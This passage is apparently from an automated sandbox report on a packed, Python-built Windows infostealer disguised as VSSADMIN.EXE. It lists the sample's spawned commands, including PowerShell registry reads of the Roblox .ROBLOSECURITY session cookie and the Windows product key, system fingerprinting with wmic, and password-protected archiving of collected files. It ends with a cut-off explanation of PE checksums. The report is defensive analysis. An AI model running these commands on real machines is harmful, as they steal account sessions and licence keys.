              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCB6.tmp" "c:\Users\user\AppData\Local\Temp\ozweafg0\CSCCDFC3EC49286452EA176429826C32718.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe a -r -hp"Zsombec1234" "C:\Users\user\AppData\Local\Temp\7sLxM.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE74EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,59_2_00007FF6EE74EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE77B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,59_2_00007FF6EE77B57C
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68562Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE753144 GetDiskFreeSpaceExW,59_2_00007FF6EE753144
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4772:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5368:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1008:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3000:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_01
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Mutant created: \Sessions\1\BaseNamedObjects\5
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_01
              Source: VSSADMIN.EXE.exe | String found in binary or memory: set-addPolicy
              Source: VSSADMIN.EXE.exe | String found in binary or memory: id-cmc-addExtensions
              Source: VSSADMIN.EXE.exe | String found in binary or memory: can't send non-None value to a just-started generator
              Source: VSSADMIN.EXE.exe | String found in binary or memory: --help
              Source: VSSADMIN.EXE.exe | String found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONINTMAXSTRDIGITS :
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: VSSADMIN.EXE.exe | Static PE information: Image base 0x140000000 > 0x60000000
              Source: VSSADMIN.EXE.exe | Static file information: File size 7380816 > 1048576
              Source: VSSADMIN.EXE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: VSSADMIN.EXE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: VSSADMIN.EXE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: VSSADMIN.EXE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: VSSADMIN.EXE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: VSSADMIN.EXE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: VSSADMIN.EXE.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: VSSADMIN.EXE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.245837300.00007FFD43EF0000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: VSSADMIN.EXE.exe
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.pdb source: powershell.exe, 00000025.00000002.213633316.000001FB93A2A000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: VSSADMIN.EXE.exe, 00000001.00000002.245935470.00007FFD43F76000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: VSSADMIN.EXE.exe, 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1u 30 May 2023built on: Wed May 31 23:27:41 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: VSSADMIN.EXE.exe, 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: VSSADMIN.EXE.exe, 00000000.00000003.187735351.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.246585404.00007FFD59301000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: VSSADMIN.EXE.exe, 00000000.00000003.187735351.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.246585404.00007FFD59301000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: 0.pdb(kD . source: powershell.exe, 00000025.00000002.224011476.000001FBAB192000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp, rar.exe, 0000003B.00000000.226038634.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.245659423.00007FFD402EB000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.245935470.00007FFD43F76000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246494699.00007FFD592D1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.pdbhP source: powershell.exe, 00000025.00000002.213633316.000001FB93A2A000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246395707.00007FFD59241000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246442794.00007FFD59271000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: VSSADMIN.EXE.exe, 00000001.00000002.246221693.00007FFD5269C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246354219.00007FFD55601000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246221693.00007FFD5269C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246310845.00007FFD52DF1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246171168.00007FFD507E1000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246126564.00007FFD449E1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.246012635.00007FFD43FC1000.00000040.00000001.01000000.0000000E.sdmp
              Source: VSSADMIN.EXE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: VSSADMIN.EXE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: VSSADMIN.EXE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: VSSADMIN.EXE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: VSSADMIN.EXE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFBE840D push cs; iretd 8_2_00007FFCDFBE8412
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFBE0B45 push ds; iretd 8_2_00007FFCDFBE0B5A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFBE81B8 push ebx; ret 8_2_00007FFCDFBE81DA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFBE00BD pushad ; iretd 8_2_00007FFCDFBE00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB6014 pushad ; retf 8_2_00007FFCDFCB601A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB6004 pushad ; retf 8_2_00007FFCDFCB6012
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB63A1 push C0000063h; ret 8_2_00007FFCDFCB63C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB5349 push ebp; retf 8_2_00007FFCDFCB534A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB533F push ebx; retf 8_2_00007FFCDFCB5342
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB06A5 push es; retf 8_2_00007FFCDFCB06F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB6243 push C0000063h; ret 8_2_00007FFCDFCB63C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB5613 push esi; retf 8_2_00007FFCDFCB5632
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB5634 push edi; retf 8_2_00007FFCDFCB563A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB4DC3 push eax; retf 8_2_00007FFCDFCB4DDA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB15DD push ss; retf 8_2_00007FFCDFCB1632
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB4D88 push C000004Dh; ret 8_2_00007FFCDFCB4DC1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB0554 push es; retf 8_2_00007FFCDFCB055A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB5144 push ebx; retf 8_2_00007FFCDFCB514A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB5134 push ecx; retf 8_2_00007FFCDFCB5142
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB9934 pushfd ; retf 8_2_00007FFCDFCB994A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFCDFCB9CB1 pushfd ; retf 8_2_00007FFCDFCB9CB2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 37_2_00007FFCDFBE00BD pushad ; iretd 37_2_00007FFCDFBE00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 37_2_00007FFCDFCB15B9 push ss; retf 37_2_00007FFCDFCB15BA
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Code function: 1_2_00007FFD3FF45510 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFD3FF45510
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline
              Source: VSSADMIN.EXE.exe | Static PE information: section name: _RDATA
              Source: libffi-8.dll.0.dr | Static PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.dr | Static PE information: section name: _RDATA
              Source: ???.scr.1.dr | Static PE information: section name: _RDATA
              Source: libcrypto-1_1.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x124d75
              Source: ozweafg0.dll.44.dr | Static PE information: real checksum: 0x0 should be: 0x2308
              Source: VSSADMIN.EXE.exe | Static PE information: real checksum: 0x70c090 should be: 0x716ffa
              Source: unicodedata.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x4a227
              Source: _ctypes.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x19e1b
              Source: _bz2.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x1784a
              Source: libffi-8.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _ssl.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x17418
              Source: sqlite3.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x9ff17
              Source: libssl-1_1.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x349c6
              Source: _queue.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0xc985
              Source: _socket.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x15415
              Source: ???.scr.1.dr | Static PE information: real checksum: 0x70c090 should be: 0x716ffa
              Source: python311.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x1a7f3d
              Source: _decimal.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x1f8c8
              Source: _hashlib.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0xa12c
              Source: select.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x12345
              Source: _lzma.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x23dc5
              Source: _sqlite3.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x1deb7
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
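              The "real checksum: X should be: Y" lines above compare the value stored in IMAGE_OPTIONAL_HEADER.CheckSum with the value the file should carry. A stored value of 0x0 means the linker never filled the field in; Windows only validates it for kernel-mode drivers and a few boot-critical images, so on its own it is a weak signal (here it mostly hits the bundled Python runtime files). The sample and the dropped ???.scr, by contrast, both carry 0x70c090 where 0x716ffa is expected, a real mismatch and, since stored and expected values are identical for both files, consistent with the Startup-folder .scr being a copy of the sample. UPX0/UPX1 are the section names the UPX packer writes. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it reimplements the imagehlp CheckSumMappedFile algorithm so the comparison can be reproduced offline, and runs it over a constructed, non-loadable PE32+ header 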